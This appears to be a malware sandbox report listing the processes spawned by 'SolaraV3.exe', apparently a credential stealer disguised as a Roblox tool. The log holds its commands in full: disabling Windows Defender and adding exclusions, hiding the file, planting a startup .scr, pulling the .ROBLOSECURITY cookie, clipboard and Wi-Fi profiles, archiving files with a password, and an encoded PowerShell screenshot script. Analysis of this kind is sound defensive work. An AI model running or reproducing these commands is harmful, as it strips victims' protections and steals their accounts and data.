Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\getmac.exe getmac
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\se3yji4z\se3yji4z.cmdline"
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESF203.tmp" "c:\Users\user\AppData\Local\Temp\se3yji4z\CSC9CC35FFA2F54059AD6E143F6E3C2E84.TMP"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user~1\AppData\Local\Temp\_MEI28842\rar.exe a -r -hp"qwerty123" "C:\Users\user~1\AppData\Local\Temp\w0e8R.zip" *"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe C:\Users\user~1\AppData\Local\Temp\_MEI28842\rar.exe a -r -hp"qwerty123" "C:\Users\user~1\AppData\Local\Temp\w0e8R.zip" *
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic os get Caption"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get totalphysicalmemory
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\reg.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Users\user\Desktop\SolaraV3.exe "C:\Users\user\Desktop\SolaraV3.exe"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SolaraV3.exe'"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('?????? ?????? ???? ????????. ?????? ??? ?????????? ????? ?????? ? ?????? ?????!', 0, 'Error!', 32+16);close()""	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\user\Desktop\SolaraV3.exe""	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\??? .scr'"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\attrib.exe attrib +h +s "C:\Users\user\Desktop\SolaraV3.exe"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\user\Desktop\SolaraV3.exe""	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIA	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\??? .scr'	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user~1\AppData\Local\Temp\_MEI28842\rar.exe a -r -hp"qwerty123" "C:\Users\user~1\AppData\Local\Temp\w0e8R.zip" *"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('?????? ?????? ???? ????????. ?????? ??? ?????????? ????? ?????? ? ?????? ?????!', 0, 'Error!', 32+16);close()""	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SolaraV3.exe'	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\mshta.exe mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('?????? ?????? ???? ????????. ?????? ??? ?????????? ????? ?????? ? ?????? ?????!', 0, 'Error!', 32+16);close()"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +h +s "C:\Users\user\Desktop\SolaraV3.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\??? .scr'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
